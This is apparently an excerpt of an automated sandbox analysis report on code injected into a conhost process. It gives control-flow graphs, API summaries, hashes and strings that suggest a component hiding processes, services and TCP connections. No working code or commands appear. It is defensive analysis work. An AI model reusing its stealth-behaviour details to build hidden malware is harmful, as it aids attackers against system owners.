                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE491992
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE49199C
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CloseOpen$Heap$AllocProcessSleep
                          • String ID:
                          • API String ID: 948135145-0
                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                          • Instruction ID: fd8c7f75c0b60f0fd735319605552630c65d66dcf015af5ba2bdb791d6551c9a
                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                          • Instruction Fuzzy Hash: 6231EA7D300A51C9FB54AB26DF413E923A4AF8ABD0F1658219E1AE7797DE36C850C218

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 197 166be492ff0-166be493069 199 166be49306f-166be493075 197->199 200 166be493384-166be4933a7 197->200 199->200 201 166be49307b-166be49307e 199->201 201->200 202 166be493084-166be493087 201->202 202->200 203 166be49308d-166be49309d GetModuleHandleA 202->203 204 166be49309f-166be4930af GetProcAddress 203->204 205 166be4930b1 203->205 206 166be4930b4-166be4930d2 204->206 205->206 206->200 208 166be4930d8-166be4930f7 StrCmpNIW 206->208 208->200 209 166be4930fd-166be493101 208->209 209->200 210 166be493107-166be493111 209->210 210->200 211 166be493117-166be49311e 210->211 211->200 212 166be493124-166be493137 211->212 213 166be493147 212->213 214 166be493139-166be493145 212->214 215 166be49314a-166be49314e 213->215 214->215 216 166be49315e 215->216 217 166be493150-166be49315c 215->217 218 166be493161-166be49316b 216->218 217->218 219 166be493251-166be493255 218->219 220 166be493171-166be493174 218->220 221 166be493376-166be49337e 219->221 222 166be49325b-166be49325e 219->222 223 166be493186-166be493190 220->223 224 166be493176-166be493183 call 166be491a30 220->224 221->200 221->212 225 166be49326f-166be493279 222->225 226 166be493260-166be49326c call 166be491a30 222->226 228 166be493192-166be49319f 223->228 229 166be4931c4-166be4931ce 223->229 224->223 231 166be4932a9-166be4932ac 225->231 232 166be49327b-166be493288 225->232 226->225 228->229 234 166be4931a1-166be4931ae 228->234 235 166be4931fe-166be493201 229->235 236 166be4931d0-166be4931dd 229->236 242 166be4932ae-166be4932b7 call 166be491cc4 231->242 243 166be4932b9-166be4932c6 lstrlenW 231->243 232->231 241 166be49328a-166be493297 232->241 244 166be4931b1-166be4931b7 234->244 239 166be49320f-166be49321c lstrlenW 235->239 240 166be493203-166be49320d call 166be491cc4 235->240 236->235 237 166be4931df-166be4931ec 236->237 245 166be4931ef-166be4931f5 237->245 248 166be49322f-166be493241 call 166be493f88 239->248 249 166be49321e-166be49322d call 166be491cfc 239->249 240->239 251 166be493247-166be49324c 240->251 247 166be49329a-166be4932a0 241->247 242->243 258 166be4932ee-166be4932f9 242->258 253 166be4932d9-166be4932e3 call 166be493f88 243->253 254 166be4932c8-166be4932d7 call 166be491cfc 243->254 244->251 252 166be4931bd-166be4931c2 244->252 245->251 255 166be4931f7-166be4931fc 245->255 247->258 259 166be4932a2-166be4932a7 247->259 248->251 263 166be4932e6-166be4932e8 248->263 249->248 249->251 251->263 252->229 252->244 253->263 254->253 254->258 255->235 255->245 267 166be493370-166be493374 258->267 268 166be4932fb-166be4932ff 258->268 259->231 259->247 263->221 263->258 267->221 271 166be493301-166be493305 268->271 272 166be493307-166be493321 call 166be4a3a40 268->272 271->272 273 166be493324-166be493327 271->273 272->273 276 166be493329-166be493347 call 166be4a3a40 273->276 277 166be49334a-166be49334d 273->277 276->277 277->267 278 166be49334f-166be49336d call 166be4a3a40 277->278 278->267
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction ID: 561070e86f55dd75a59d82426419ebb0a8ac24a22321aef90a4578fc182b6dd7
                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                          • Instruction Fuzzy Hash: A5B17E3A310690CAEB658F25DE047EAA3A5FB86BD5F445016EE09E3B96DF36CD40C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction ID: 4ae9e79a8873629d9d1b332e5f4339e944e085aa3c287e476b829f00ce75d21d
                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                          • Instruction Fuzzy Hash: 4C317E76305B80DAEB608F64EC403EE7364F788794F44402ADA4E97B99EF79C648CB10
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction ID: 85ba845a2acfbb1560f5fe6f3a2bbcce4c1bc2d016153d01daa8d5c97245836f
                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                          • Instruction Fuzzy Hash: 2F412936314B80DAEB60CB25EC403DE73A4F7887A4F540225EA9D97B99DF79C555CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction ID: 574c1045bfab0f6feb1be90c69e3005a9ceca5faf5218fcae4327c0d8558d306
                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                          • Instruction Fuzzy Hash: 50A1E536704681CDFB20DB75EE803ED6BA1E781BE4F144115DE99BBA9ADB3AC441C700

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 2135414181-2609720707
                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction ID: 8de483516d2ad70ab3e8ba4cd151b213d3391736beea3786faf10fd88ccfc07a
                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                          • Instruction Fuzzy Hash: 36710C3A750A50CAEB109F65ED906DD23A4FB85BDCF412121DE4EA7B69DF3AC444C740

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction ID: 4bd5dae956d677d2360586ccdc672ba4e612c2510c0a820f297e60f8a0a1cddb
                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                          • Instruction Fuzzy Hash: B5512B36714B84DAE724CF62EE483AAB7A2F789FD8F444124DA4A87758DF3DD0458B00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 740688525-1880043860
                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction ID: af850c23804337fb4d43cdd508c3f337783aad8708ffbdb147fc4742956e1e5a
                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction Fuzzy Hash: F051A035701B44D9EA249BA6AE003EA2290BB48BF0F5817359E3D977D2DF3AD845C640

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Running Time
                          • API String ID: 1943346504-1805530042
                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction ID: 7a7c65d7e3649bd5c972ce1a3872868317140ced5d5015e5133e9c77956c8a0c
                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                          • Instruction Fuzzy Hash: 3531D236B00A40EAE721CF13AE047D9A3A0F7C9FD6F450525DE4993625DF3DD8568740

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$CounterInfoProcess$AllocFree
                          • String ID: \GPU Engine(*)\Utilization Percentage
                          • API String ID: 1943346504-3507739905
                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction ID: 929066317cb247bd81c39ea5e9c8fd590d08d581e77d694c5d65ab026869f518
                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                          • Instruction Fuzzy Hash: 30318935B10B41DAEB10DF22AE8479A63A1FBC9FE5F4450259E4AD3725EE39D441C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 313 166be49a22c-166be49a294 call 166be49b144 316 166be49a6f5-166be49a6fb call 166be49c388 313->316 317 166be49a29a-166be49a29d 313->317 317->316 319 166be49a2a3-166be49a2a9 317->319 321 166be49a2af-166be49a2b3 319->321 322 166be49a378-166be49a38a 319->322 321->322 323 166be49a2b9-166be49a2c4 321->323 324 166be49a390-166be49a394 322->324 325 166be49a645-166be49a649 322->325 323->322 327 166be49a2ca-166be49a2cf 323->327 324->325 326 166be49a39a-166be49a3a5 324->326 328 166be49a682-166be49a68c call 166be499324 325->328 329 166be49a64b-166be49a652 325->329 326->325 330 166be49a3ab-166be49a3af 326->330 327->322 331 166be49a2d5-166be49a2df call 166be499324 327->331 328->316 341 166be49a68e-166be49a6ad call 166be498070 328->341 329->316 332 166be49a658-166be49a67d call 166be49a6fc 329->332 334 166be49a575-166be49a581 330->334 335 166be49a3b5-166be49a3f0 call 166be499704 330->335 331->341 346 166be49a2e5-166be49a310 call 166be499324 * 2 call 166be499a0c 331->346 332->328 334->328 342 166be49a587-166be49a58b 334->342 335->334 350 166be49a3f6-166be49a3ff 335->350 343 166be49a59b-166be49a5a3 342->343 344 166be49a58d-166be49a599 call 166be4999cc 342->344 343->328 349 166be49a5a9-166be49a5b6 call 166be4995a4 343->349 344->343 357 166be49a5bc-166be49a5c4 344->357 380 166be49a330-166be49a33a call 166be499324 346->380 381 166be49a312-166be49a316 346->381 349->328 349->357 355 166be49a403-166be49a435 350->355 359 166be49a568-166be49a56f 355->359 360 166be49a43b-166be49a447 355->360 362 166be49a6d8-166be49a6f4 call 166be499324 * 2 call 166be49c2f4 357->362 363 166be49a5ca-166be49a5ce 357->363 359->334 359->355 360->359 364 166be49a44d-166be49a46c 360->364 362->316 366 166be49a5e1 363->366 367 166be49a5d0-166be49a5df call 166be4999cc 363->367 368 166be49a472-166be49a4af call 166be4999e0 * 2 364->368 369 166be49a558-166be49a55d 364->369 376 166be49a5e3-166be49a5ed call 166be49b1dc 366->376 367->376 395 166be49a4e2-166be49a4e5 368->395 369->359 376->328 388 166be49a5f3-166be49a643 call 166be499634 call 166be499838 376->388 380->322 394 166be49a33c-166be49a35c call 166be499324 * 2 call 166be49b1dc 380->394 381->380 386 166be49a318-166be49a323 381->386 386->380 392 166be49a325-166be49a32a 386->392 388->328 392->316 392->380 418 166be49a35e-166be49a368 call 166be49b2cc 394->418 419 166be49a373 394->419 399 166be49a4b1-166be49a4d7 call 166be4999e0 call 166be49a96c 395->399 400 166be49a4e7-166be49a4ee 395->400 414 166be49a4f9-166be49a556 call 166be49a158 399->414 415 166be49a4d9-166be49a4dc 399->415 403 166be49a55f 400->403 404 166be49a4f0-166be49a4f4 400->404 409 166be49a564 403->409 404->368 409->359 414->409 415->395 423 166be49a36e-166be49a6d1 call 166be498f84 call 166be49ad28 call 166be499178 418->423 424 166be49a6d2-166be49a6d7 call 166be49c2f4 418->424 419->322 423->424 424->362
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction ID: f5fcb79197fb1821e5c1190ebf7ca691809633bbe2d4fefc0a563e707d9e2a8e
                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                          • Instruction Fuzzy Hash: 3FD17A3A704780CEEB60DF699E453DD77A0F7897D8F100215EA89A7B9ACB3AC484D700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction ID: 96ec39e6920fa117b4d47788cf550bb171a733e85bd1ade17c2eda62e1e750a2
                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                          • Instruction Fuzzy Hash: 45D19A3A600780DAEB30DF66D8813ED77A8F789788F105155EE8997B9ADFB6C091C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 434 166be49104c-166be4910b9 RegQueryInfoKeyW 435 166be4910bf-166be4910c9 434->435 436 166be4911b5-166be4911d0 434->436 435->436 437 166be4910cf-166be49111f RegEnumValueW 435->437 438 166be4911a5-166be4911af 437->438 439 166be491125-166be49112a 437->439 438->436 438->437 439->438 440 166be49112c-166be491135 439->440 441 166be491147-166be49114c 440->441 442 166be491137 440->442 444 166be49114e-166be491193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->444 445 166be491199-166be4911a3 441->445 443 166be49113b-166be49113f 442->443 443->438 446 166be491141-166be491145 443->446 444->445 445->438 446->441 446->443
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction ID: d937a312bc7b3bde9fea1102b2106fbccbd3f6392db440e88237d10bc8ced6b0
                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                          • Instruction Fuzzy Hash: 22418B33614B80DAE760CF21E94479EB7A1F389BD8F448129DA8957B58DF3DD889CB40

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                          • String ID: \\.\pipe\$cnt-childproc
                          • API String ID: 166002920-175842701
                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction ID: 506efe6d6b9e80dd638bf699ff88a1647717e28096857f8f31de0f5d2fa38b4f
                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                          • Instruction Fuzzy Hash: 80114636718B40C2E7108B21FD5839A7760F789BE4F945325EA9982BA8DF3DC148CF40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 452 166be497c50-166be497c56 453 166be497c91-166be497c9b 452->453 454 166be497c58-166be497c5b 452->454 455 166be497db8-166be497dcd 453->455 456 166be497c85-166be497cc4 call 166be4982f0 454->456 457 166be497c5d-166be497c60 454->457 461 166be497dcf 455->461 462 166be497ddc-166be497df6 call 166be498184 455->462 475 166be497d92 456->475 476 166be497cca-166be497cdf call 166be498184 456->476 459 166be497c62-166be497c65 457->459 460 166be497c78 __scrt_dllmain_crt_thread_attach 457->460 467 166be497c71-166be497c76 call 166be498234 459->467 468 166be497c67-166be497c70 459->468 465 166be497c7d-166be497c84 460->465 463 166be497dd1-166be497ddb 461->463 473 166be497df8-166be497e29 call 166be4982ac call 166be49814c call 166be498634 call 166be498450 call 166be498474 call 166be4982dc 462->473 474 166be497e2b-166be497e5c call 166be4984b0 462->474 467->465 473->463 484 166be497e5e-166be497e64 474->484 485 166be497e6d-166be497e73 474->485 479 166be497d94-166be497da9 475->479 487 166be497ce5-166be497cf6 call 166be4981f4 476->487 488 166be497daa-166be497db7 call 166be4984b0 476->488 484->485 489 166be497e66-166be497e68 484->489 490 166be497eb5-166be497ecb call 166be493a1c 485->490 491 166be497e75-166be497e7f 485->491 502 166be497d47-166be497d51 call 166be498450 487->502 503 166be497cf8-166be497d1c call 166be4985f8 call 166be49813c call 166be498168 call 166be49b428 487->503 488->455 496 166be497f52-166be497f5f 489->496 508 166be497f03-166be497f05 490->508 509 166be497ecd-166be497ecf 490->509 497 166be497e81-166be497e84 491->497 498 166be497e86-166be497e8c 491->498 505 166be497e8e-166be497e94 497->505 498->505 502->475 523 166be497d53-166be497d5f call 166be4984a0 502->523 503->502 554 166be497d1e-166be497d25 __scrt_dllmain_after_initialize_c 503->554 512 166be497f48-166be497f50 505->512 513 166be497e9a-166be497eaf call 166be497c50 505->513 518 166be497f07-166be497f0a 508->518 519 166be497f0c-166be497f21 call 166be497c50 508->519 509->508 516 166be497ed1-166be497ef3 call 166be493a1c call 166be497db8 509->516 512->496 513->490 513->512 516->508 549 166be497ef5-166be497efa 516->549 518->512 518->519 519->512 534 166be497f23-166be497f2d 519->534 542 166be497d61-166be497d6b call 166be4983b8 523->542 543 166be497d85-166be497d90 523->543 540 166be497f2f-166be497f32 534->540 541 166be497f34-166be497f42 534->541 546 166be497f44 540->546 541->546 542->543 553 166be497d6d-166be497d7b 542->553 543->479 546->512 549->508 553->543 554->502 555 166be497d27-166be497d44 call 166be49b3f0 554->555 555->502
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
